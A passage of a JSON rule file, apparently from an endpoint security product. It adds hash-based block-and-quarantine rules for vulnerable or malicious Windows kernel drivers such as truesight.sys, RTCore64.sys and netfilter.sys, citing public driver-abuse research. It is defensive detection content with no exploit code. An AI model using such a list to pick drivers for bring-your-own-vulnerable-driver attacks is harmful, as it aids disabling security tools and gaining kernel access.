"03e0581432f5c8cc727a8aa387f5b69ff84d38d0df6f1226c19c6e960a81e1e9", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c517633c-9f86-536a-b5f5-d981528d275a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142632Z", + 
"creation_date": "2026-03-23T11:45:32.142634Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142640Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26ed45461e62d733f33671bfd0724399d866ee7606f3f112c90896ce8355392e", + "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c5257184-85e1-5c3e-8e45-fd0bde106e11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480638Z", + "creation_date": "2026-03-23T11:45:30.480645Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd5bff03256b98922b47a2725128540953a0ac15bd2be204196917d0c707a9cb", + "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c525aa61-ce66-55aa-939c-6df7c4443545", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811417Z", + "creation_date": "2026-03-23T11:45:31.811419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811425Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "071b0aa6f5eafe164f0642cf7cbb2ca27f890ce5210133efa2fd2e5c3ec60c88", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c52d3080-6a79-5c30-8c36-b7f1ed4ea1cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836415Z", + "creation_date": "2026-03-23T11:45:30.836417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836423Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c22480fd746fd8fcd2fb1cc8bcd599759805be1b50e1ff0acefdb6395f1659ab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c52f0d3f-fb35-59a4-9d25-0a7505ebd61b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150036Z", + "creation_date": "2026-03-23T11:45:31.150038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150043Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59e264faab9e0716c5ebcdc8feb361f9f82a616840f6149fb7591949b697c4cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c530da92-e1bf-5f7b-a67c-1896379e8746", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619700Z", + "creation_date": "2026-03-23T11:45:29.619702Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619707Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "326b53365f8486c78608139cac84619eff90be361f7ade9db70f9867dd94dcc9", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c53438da-046e-5ee7-9044-5eaba2d518d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458927Z", + "creation_date": "2026-03-23T11:45:30.458930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458939Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"71701c5c569ef67391c995a12b21ca06935b7799ed211d978f7877115c58dce0", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c53cc170-7ff5-50a0-b1ae-8c7fee6ee915", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476499Z", + "creation_date": "2026-03-23T11:45:31.476503Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476513Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "037701c562e9c44897b9e37b2e5cb4f16b5420e1bc17ffc2d4d53f314400275e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c55590fa-a151-554a-9f90-c5b100baf586", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985777Z", + "creation_date": "2026-03-23T11:45:29.985779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985785Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8807e365be2813b7eccd2e4c49afb0d1e131086715638b7a6307cd7d7e9556c", + "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [CVE-2022-42046] [https://github.com/kkent030315/CVE-2022-42046] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c559153d-1f34-50fe-aa02-a6b6f5e650ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490437Z", + "creation_date": "2026-03-23T11:45:31.490439Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490444Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d48cf5f3deb5404e2020f2bf68c4c7f36b183b0c0fdcbb4e99bfef9d10ce51d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c56cc959-3c0f-506e-b50d-3b0dc0f19bb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826729Z", + "creation_date": "2026-03-23T11:45:31.826731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4215f0b6a23010731723be817cbd4258377f183b4253496917013cb471b9099a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c5742ce7-6f64-5aaf-981c-a159b91a1545", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812857Z", + "creation_date": "2026-03-23T11:45:31.812859Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97a1b74fb41d4ef4838b85283f096151fc675edaa5e2190200f17c25583162d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c57741f6-fc0c-5d7f-af50-04d454d2b358", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150789Z", + "creation_date": "2026-03-23T11:45:31.150791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "202a6dfbf79ffe81b5c6528989eb2e1654a396dbbbaa5c7579e0e93c64869e16", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c57bd092-c111-5a12-898e-c0cc62bc2c8d", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472409Z", + "creation_date": "2026-03-23T11:45:31.472412Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1332d398824663df3b9bef3bb5f26fbeac2883c49b2ca832a9c4db4c572eabc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c57ca051-ec3c-5e24-8488-399c1c32691f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461526Z", + "creation_date": "2026-03-23T11:45:30.461529Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.461538Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7113dee11925b346192f6ee5441974db7d1fe9b5be1497a6b295c06930fdd264",
+ "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c584c05e-bbd7-5c27-81dc-36e60fd669bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492268Z",
+ "creation_date": "2026-03-23T11:45:31.492270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0386ed36fdd44d7645fe5ef420d885a2a1e74cb77074274734cd36dd3fbb10f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5882499-3776-58db-8c3f-b7d80449e972",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473779Z",
+ "creation_date": "2026-03-23T11:45:30.473785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cad825ef477bdbafda6be0bbe9149d915560077d9017655fdb7f2233da9ad01",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c599e9d4-4ff6-5842-aa0a-8fc6d5e8e57e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143042Z",
+ "creation_date": "2026-03-23T11:45:32.143044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c6a4d07e95ab4212c2afefcb0ce37dc485fa56120b0419b636bd8bd326038c1",
+ "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5a40e4b-69e6-52f6-b7c3-75af42a9a819",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835825Z",
+ "creation_date": "2026-03-23T11:45:30.835826Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49a0e50f8d434282b7393389a08e55aa430c2bfadfaafc5d747fcadcdb9869ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5ad0236-4dc3-5056-96a5-e3af9336e172",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982177Z",
+ "creation_date": "2026-03-23T11:45:29.982180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a3090ae46b3ce5f4cc6ba2d4dd265033e23c813d5c1e9c7a20a84d5d167dae3",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5ae0724-cdd1-5570-997e-c7645c559254",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455108Z",
+ "creation_date": "2026-03-23T11:45:30.455111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93d99a5fbfc888c0a40a18946933121ae110229dcf206b4d17116a57e7cf4dc9",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5b47207-b5ce-53b8-9df8-e0571a109f3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816062Z",
+ "creation_date": "2026-03-23T11:45:30.816064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816070Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5cbe195ef5e86f705c8290602ae688e1835e7385ed68ae264c4795e425c1645f",
+ "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5c497cb-b547-5844-961c-6893f2428abf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490574Z",
+ "creation_date": "2026-03-23T11:45:31.490576Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea66dc3a26e2e6a325f2e738cf22fbb90069d30ee2d678abe9ce89ede145834e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c5ce6fab-58a5-5a25-97d9-03cf56029eed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606226Z",
+ "creation_date": "2026-03-23T11:45:29.606228Z",
+ "enabled": true,
